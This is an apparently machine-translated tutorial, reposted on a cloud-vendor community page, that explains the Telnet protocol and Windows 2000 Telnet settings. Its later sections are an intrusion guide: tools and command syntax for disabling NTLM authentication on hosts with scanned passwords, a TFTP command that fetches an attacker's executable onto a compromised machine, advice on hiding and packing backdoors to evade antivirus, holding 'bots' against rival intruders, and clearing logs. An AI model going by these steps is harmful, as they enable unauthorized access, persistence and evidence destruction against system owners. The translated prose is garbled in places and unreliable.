Telnet White Paper

Source: Internet
Author: User
Tags printable characters dedicated server file transfer protocol
The telnet application not only facilitates remote login, but also provides hackers with another intrusion method and backdoor. However, while enjoying the convenience that Telnet brings to you, do you really know about Telnet?

2. Remote Logon

Although the telnet service is also a client/server model service, it is more important to achieve remote Logon (remote interactive computing) based on the Telnet protocol ), so let's get to know about remote logon.

1. Basic concepts of Remote Login

First, let's take a look at what is Logon: the time-sharing system allows multiple users to use a computer at the same time. To ensure system security and ease of accounting, the system requires each user to have a separate account as the logon ID, the system also specifies a password for each user. Before using the system, you need to enter the ID and password. This process is called "Logon '.

Remote Login refers to the process in which a user uses Telnet commands to temporarily turn his computer into a simulation terminal of the remote host. The simulation terminal is equivalent to a non-intelligent machine. It is only responsible for passing each character entered by the user to the host, and then displaying each information output by the host on the screen.

2 Remote Login generation and development

We can first create a remote text editing service. The implementation of this service requires a server that accepts the file editing request and data, and a client that sends this request. The client will establish a TCP connection from the local machine to the server. Of course, this requires the server to respond, then send the entered information (File editing information) to the server, and read the output from the server. The above is a standard and common client/server model service.

It seems that with the client/server model service, all remote problems can be solved. However, it is not as simple as you think. If we only need to edit files remotely, the service we just proposed is fully qualified, but if our requirements are not that simple, we also want to implement remote user management, remote data entry, remote system maintenance, and all operations that can be performed on the remote host, then we will need a large number of dedicated server programs and use a server process for every computing service. The problem that comes with it is that remote machines will soon be overwhelmed by server processes, and drowned in the ocean of processes (Here we exclude the most specialized remote machines ).

Is there a solution? Of course, we can use remote logon to solve all this problem. We allow users to establish a login session on a remote machine and execute commands to implement more general services, just like local operations. In this way, we can access all the available commands on the remote system, and the system designer does not need to provide multiple dedicated server programs.

The problem seems to have a bright future. Remote Login should solve the problem, but it is not easy to achieve remote login. Regardless of the computer system designed by the network, you are expected to log on only from the directly connected keyboard and display. To add the remote login function to this computer, you need to modify the operating system of the machine, this is extremely difficult and we try to avoid it. Therefore, we should concentrate on the construction of remote login server software, although this is also relatively difficult. Why is it difficult to do so?

For example, the operating system assigns special meanings to some special buttons. For example, the local system interprets 'ctrl + C' as 'terminating the currently running command process '. However, if we have run the remote login server software, 'ctrl + C' may not be transferred to the remote machine, if the client actually uploads 'ctrl + C' to the remote machine, the 'ctrl + C' command may not terminate the local process, that is, confusion may occur here. This is only one of the difficulties encountered.

However, despite the technical difficulties, system programmers managed to construct remote login server software that can be applied to most operating systems and constructed application software that acts as a client. Generally, the client software removes the local interpretations of all keys except one key and converts these local interpretations into remote interpretations, this makes the interaction between the client software and the remote machine just like sitting in front of the remote host, thus avoiding the confusion mentioned above. The key with the only exception can bring the user back to the local environment.

Design remote login server as application-level software. Another requirement is that the operating system must provide support for pseudo terminals (Pseudo Terminal. We use a Pseudo Terminal to describe the entry point of the operating system. It allows programs like the telnet server to send characters to the operating system and make the characters as if they were from a local keyboard. Only when such an operating system is used can the remote login server be designed as application-level software (such as telnet server software). Otherwise, local and remote system transfer will not recognize the information sent from the other party (because they can only identify the information typed from the local keyboard), remote login will fail.

Although the Design of Remote Login server as application-level software has significant advantages: it is easier to modify and control the server than to embed code into the operating system. However, this design is acceptable because the efficiency is not high (the subsequent content will be explained.

3. Remote Logon

When using the Telnet protocol for remote login, the following conditions must be met: the computer must have a client program containing the Telnet protocol; the IP address or domain name of the remote host must be known; the logon ID and password must be known.

The telnet remote Logon Service consists of the following four processes:

1) establish a local connection with the remote host. In this process, a TCP connection is established. You must know the IP address or domain name of the remote host;

2) Transmit the user name and password entered on the local terminal and any commands or characters subsequently entered to the remote host in nvt (net virtual terminal) format. In this process, an IP datagram is actually sent from the local host to the remote host;

3) convert the nvt format data output by the remote host to a local accepted format and send it back to the local terminal, including the command echo and command execution result;

4) Finally, the local terminal unconnects the remote host. This process revokes a TCP connection.

The above content only discusses the most basic things of remote login. The complexity and the hardships of programmers are hard to imagine. I don't know if you are comfortable using telnet, have you thought of this!

3. Telnet protocol

We know that the telnet server software is the most commonly used remote login server software. It is a typical client/server model service that uses the Telnet protocol to work. So what is the Telnet protocol? What features does it have?

1. Basic Content

The telnet protocol is a member of the TCP/IP protocol family and is the standard protocol for the Internet remote login service. The telnet protocol can be used to convert the computer used by the local user into a terminal of the remote host system. It provides three basic services:

1) Telnet defines a network virtual terminal to provide a standard interface for a remote system. Client programs do not have to have a detailed understanding of distant systems. They only need to construct programs using standard interfaces;

2) Telnet includes a mechanism that allows the client and server to negotiate options, and it also provides a set of standard options;

3) Telnet performs symmetric processing on the two ends of the connection. That is, Telnet does not force the client to input data from the keyboard or display the output on the screen.

2. Heterogeneous adaptation

To make Telnet interaction between multiple operating systems possible, you must have a detailed understanding of heterogeneous computers and operating systems. For example, in some operating systems, each line of text needs to end with an ASCII carriage return controller (CR), and in other systems, an ASCII Line Break (LF) is required ), there are also some systems that need to use a two-character sequence carriage return-line feed (CR-LF); for example, most operating systems provide users with a shortcut to interrupt the program, however, this shortcut key may vary across systems (some systems use Ctrl + C, while others use escape ). If the heterogeneity between systems is not considered, the characters or commands sent locally may be inaccurate or cause errors after being transferred to the remote and interpreted by the remote system. Therefore, the Telnet protocol must solve this problem.

To adapt to heterogeneous environments, the Telnet protocol defines the transmission mode of data and commands over the Internet. This definition is called the network virtual terminal nvt (net virtual terminal ). Its application process is as follows:

For the sent data: the client software converts the buttons and command sequences from the user terminal to the nvt format and sends them to the server. The server software will receive the data and commands, convert the nvt format to the format required by the remote system;

For returned data: the remote server converts the data from the remote server to the nvt format, while the local client then converts the received nvt format data to the local format.

If you are interested in the detailed definition of the nvt format, you can find the relevant information.

3 Send remote commands

We know that most operating systems provide various shortcut keys to implement corresponding control commands. When you type these shortcut keys on a local terminal, the local system will execute the corresponding control commands, instead of using these shortcut keys as input. So for telnet, what does it use to implement remote transmission of control commands?

Telnet also uses nvt to define how control functions are transmitted from the client to the server. We know that the usascii character set includes 95 printable characters and 33 control codes. When you type a common character locally, nvt transmits it according to its original meaning. When you type a shortcut key (key combination, nvt transfers it to a special ASCII character over the network and converts it to the corresponding control command after it reaches the remote machine. There are two main reasons for distinguishing the normal ASCII character set from the control command:

1) this distinction means that Telnet has greater flexibility: It can transmit all possible ASCII characters and all control functions between the client and the server;

2) This distinction allows the client to have no ambiguity-specific signaling, without confusion between the control function and common characters.

4. Data Flow

As mentioned above, designing Telnet as an application-level software has one disadvantage: low efficiency. Why? The following shows the data flow in telnet:

The data is typed by the user on the local keyboard and transmitted to the client program through the operating system. The client program processes the data and returns the data to the operating system. The data is transmitted over the network to the remote machine, the remote operating system sends the received data to the server program, and the server program processes the data again. Then, the system returns the Pseudo Terminal entry point on the operating system. Finally, the remote operating system transmits data to the application that the user is running. This is a complete input process, and the output is transmitted from the server to the client according to the same path.

Because the computer switches the process environment several times for each input and output, this overhead is very expensive. Fortunately, the user's input speed is not high. We can still accept this disadvantage.

5. Force Command

We should consider this situation: assume that the local user runs an endless loop of error commands or programs on the remote machine, and the command or program has stopped reading input, therefore, the buffer of the operating system may be full. In this case, the remote server cannot write data to the Pseudo Terminal and eventually stop reading data from the TCP connection, the buffer of the TCP connection will eventually be full, thus blocking the flow of data streams into the connection. If this happens, the local user will lose control of the remote machine.

To solve this problem, the Telnet protocol must use the out-of-band signaling to force the server to read a control command. We know that TCP uses an emergency data mechanism to implement out-of-band data signaling, so Telnet only needs to append a retained eight-bit group called date mark, then, the server can be notified by sending a packet segment with an emergency data bit over TCP. The packet segment carrying the emergency data will bypass the traffic control and directly reach the server. As a response to emergency signaling, the server reads and discards all data until a data mark is found. After the server encounters a data mark, it returns a normal processing process.

6 Option Negotiation

Due to the heterogeneity of the machines and operating systems at the two ends of Telnet, it is impossible for telnet to strictly specify the detailed configuration of each Telnet connection. Otherwise, the adaptability and heterogeneity of Telnet will be greatly affected. Therefore, Telnet adopts the option negotiation mechanism to solve this problem.

The range of Telnet options is wide: some options extend the general functions, while some options involve some minor details. For example, there is an option to control whether Telnet works in half-duplex or full-duplex mode (in the big direction); there is also an option to allow servers on remote machines to determine the user terminal type (small details ).

The negotiation method of the telnet option is also very interesting. It is symmetric for each option, that is, any end can send a negotiation application; any end can accept or reject this application. In addition, if one end tries to negotiate options that the other end does not know, the one end that accepts the request can simply refuse the negotiation. Therefore, updates and more complex versions of the Telnet client server may interact with older and less complex versions. If both the client and server understand the new options, the interaction may be improved. Otherwise, they will run together in a less efficient but workable manner. All these designs aim to enhance the adaptability to heterogeneity. We can see how important it is to the application and development of Telnet.

Some principles have been discussed above. Although it is difficult for us to access this layer during the use of Telnet, I think it makes sense to understand this layer, it will give us a lot of inspiration. Let's take a look at the Win2000 Telnet service.

(This series of tutorials occasionally updated, to get the latest version, please log on to the official website: caicainiao club

Four Win2000 Telnet Service

In fact, from the application layer, there is nothing to say about the Win2000 Telnet service. You can get the vast majority of the content from the help file. I just want to sort it out.

1. Basic Configuration

Win2000 provides Telnet client and server program: login.

The Telnet service is installed in Windows 2000 by default, but it is not started by default. Some default settings of the Telnet service in the Help file are as follows:

Allowtrusteddomain: whether to allow access by domain users. The default value is 1, which allows access by trusted domain users. It can be changed to 0: access by domain users is not allowed (only local users are allowed ).

Defaultdomain: Any domain that has a trust relationship with the computer. The default value is ".".

Defaultshell: shows the path where the shell is installed. The default value is % SystemRoot %/system32/cmd.exe/Q/K.

Maxfailedlogins: displays the maximum number of failed attempts before the connection ends. The default value is 3.

Loginscript: displays the path of the logon script on the Telnet server. The default location is "% SystemRoot %/system32/login. cmd". You can change the script content so that the welcome screen for logon to telnet is different.

NTLM: NTLM authentication option. The default value is 2. You can have the following values:

0: NTLM authentication is not used.

1: First try NTLM authentication. If it fails, use the user name and password.

2: Only NTLM authentication is used.

Telnetport: the port on which the telnet server listens for telnet requests. The default value is 23. You can also change it to another port.

You can use tlntadmn.exe (Telnet Server Management Program) for convenient configuration. After configuration, You need to restart the telnet service. 1


When it comes to telnet, we can't help but mention NTLM. I think this is one of the biggest headache for intruders. Even if you get the Administrator account and password, it is not easy to simply use NTLM, in addition, Telnet in Win2000 only verifies the identity in NTLM mode by default, which forces us to pay attention to NTLM. What is NTLM?

The early SMB protocol clearly transmitted the password on the network, and later appeared the "LAN Manager challenge/response" verification mechanism, lm for short, which is very simple and easy to crack, microsoft then proposed the WindowsNT challenge/response verification mechanism, that is, NTLM. Now we have an updated NTLMv2 and Kerberos verification system. The NTLM workflow is as follows:

1. The client first encrypts the current user's password locally into a password hash.

2. The client sends an account to the server. This account is not encrypted and is directly transmitted in plaintext.

3. The server generates a 16-bit random number and sends it to the client as a Challenge (Challenge)

4. The client encrypts the challenge with the encrypted password hash, and then returns the challenge to the server. As response (response)

5. the server sends the username, challenge to the client, and response returned by the client to the domain controller.

6. the domain controller uses this user name to find the user's password hash in the SAM password management library, and then uses this password hash to encrypt challenge.

7. the domain controller compares two encrypted challenge. If the same, the authentication is successful.

From the process above, we can see that NTLM sends a login request to the Telnet server as the current user, instead of logging in with the account and password of the administrator of the other party you scanned. Obviously, your logon will fail. For example, the name of your machine is a (Local Machine), the name of the machine you intrude into is B (remote machine), your account on a is xinxin, And the password is 1234, the Administrator account you scanned for B is administrator and the password is 5678. When you want to telnet to B, NTLM will automatically use the current user's account and password as the login creden to perform the above 7 operations, that is, using xinxin and 1234, instead of using the Administrator and 5678 you scanned, all of these operations are completed automatically without giving you any chance to intervene. Therefore, your login operation will fail.

Because the telnet server has three options for NTLM usage, When you telnet a remote machine, one of the following is displayed:

1) when the AUTHENTICATION option is 0


Microsoft (r) Windows (TM) Version 5.00 (build 2195)

Welcome to Microsoft Telnet Service

Telnet Server build 5.00.99201.1



// If the value is 0, ntml authentication is not used. Enter the user name and password directly. For example, you can enter the Administrator and 5678

2) When the AUTHENTICATION option is 1


NTLM authentication failed due to insufficient credentials. Please login withclear text username and password

Microsoft (r) Windows (TM) Version 5.00 (build 2195)

Welcome to Microsoft Telnet Service

Telnet Server build 5.00.99201.1



// Try NTLM authentication first. If it fails, use the user name and password. In fact, this method is no different from the previous method.

3) when the AUTHENTICATION option is 2


NTLM authentication failed due to insufficient credentials. Please login withclear text username and password

Server allows NTLM authentication only

Server has closed connection

The connection to the host is lost.


// Take a closer look at the above display. There is no chance to enter the user name and password for you. You can directly disconnect the connection and scan the password.

Therefore, for intruders, NTLM is a mountain standing in front of us and must be removed. Generally, we have the following methods:

1. Modify the telnet server configuration by modifying the Remote Registry and change the Authentication Mode from 2 to 1 or 0;

2. Use ntlm.exe and run it directly after upload. You can change the Telnet Server Authentication Mode from 2 to 1;

3. Create a user scanned locally, enable the Telnet client as the user, and perform remote logon;

4. Use software, such as opentelnet.exe (Administrator permission required and IPC pipeline enabled)

5. Use scripts, such as RTCs (Administrator permission is required but the IPC pipeline is not required)

The above five methods are basically used. The last two methods are commonly used to enable telnet, and the method of use is very simple. The command is as follows:

Opentelnet.exe // Server Username Password ntlmauthor telnetport

Opentelnet.exe // server address administrator username and password authentication method (enter 0 or 1) Telnet port

Cscript RTCs. VBE targetip Username Password ntlmauthor telnetport

Cscript RTCs. VBE <target IP address> <administrator user name> <password> <Verification Method>

5. What should I do in Telnet?

I thought it was over, but many of my friends said they didn't know what to do after Telnet. In this case, let me introduce it to others. This time I will not discuss specific practices, just talking about ideas, what? Why not talk about specific practices? I will explain it one by one later.

1. View System Information

Look at the system configurations and versions (using type C:/boot. INI to know pro or server), to see what services or software are installed (from the directory name you can know), to see what is important or interesting files (alas, if it is a foreign machine, it cannot be understood), look at his user situation, in short, it is to learn as much as possible about the system, for a while to install a backdoor to the bottom.

2. Use TFTP to transfer files

I think everyone has encountered the problem of transferring files in Telnet, because we are used to file transmission in the IPC pipeline, so some friends like to use net share IPC $ to open the pipeline, then, use copy to transfer files. However, this is troublesome. Now that we have obtained the shell, we can use the tfpt command to do all this. What is TFTP?

Trivial File Transfer protocol.pdf the transfer of real-time files is a File Transfer Based on the udpconnection. Generally, a complete transmission structure is constructed using tftp.exe and a TFTP server software. It is used in this way: first run the local TFTP server(such as tftpd32.exe) software and ensure that it is always enabled until the transmission is complete, and then in Telnet (of course you can also in other shells) run the following command:

C:/> TFTP-I IP get xinxin.exe C:/ABC/xinxin.exe

In this example, you can upload xinxin.exe to the ABC directory of drive C (downloaded from the TFTP server)

It should be noted that if you use a proxy IP address, you will not be able to transfer files with external networks. Because your proxy gateway will add its IP address to your datagram during data encapsulation, instead of your internal network address, therefore, the TFTP server cannot be found when Mac addressing is performed on the external network.

3. Backdoor placement

It seems a little early to place the backdoor in the second step. If you have other purposes such as damage-based or modify the homepage, you can certainly do these things before the backdoor is placed; if you just want to get a zombie, there's nothing to say, just install a backdoor.

There are many types of backdoors, which also provide us with a lot of options. It is indeed a learning to select the appropriate backdoors based on the actual situation. Common backdoors include Trojans, ASP Trojans, remote control software, clone accounts, create and hide accounts, telnet, Telnet extended shell, and terminal services. Pay attention to the following points when installing a good BACKDOOR:

1. Do not be scanned and blocked by the firewall: it is best to shell the backdoor that is added to the virus database to escape the firewall. Try to use a low port for communication to avoid being blocked by the firewall.

2. Maximize Concealment: If you choose remote control software, pay attention to the installation prompts and small icons on the controlled end, and whether to synchronize the screen. If you write an article on your account, try to ensure that there are no flaws in cmd and user management. If you choose to put a trojan or telnet extension, be sure to hide the files and processes; if the terminal service is newly opened (not opened before intrusion), you must drop the conspicuous port 3389, and the lower the port, the better.

3. Do not assume that the Administrator does not exist: this is a big taboo. Many friends create an administrator account similar to 'hacking' on a machine with only default accounts. This is really fearless. So when you place backdoors, think about where the Administrator is negligent.

4. Patch

If you want to dominate bots, You need to patch them. You need to know that the competition for BOTs is fierce. How to install patches? What should I ask? Think about how you got in. Forget it. In addition to fixing major vulnerabilities (uploading and running official patches), you should also pay attention to the sharing of these vulnerabilities, IPC $ sharing (preferably close all of them), and suspicious ports, services that are easy to use. However, you should also pay attention to concealment when patching. Do not let the Administrator discover major changes.

5. Clear logs

You can use the software manually. If you are not familiar with the software, go to the relevant teaching materials. I will not detail it here.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.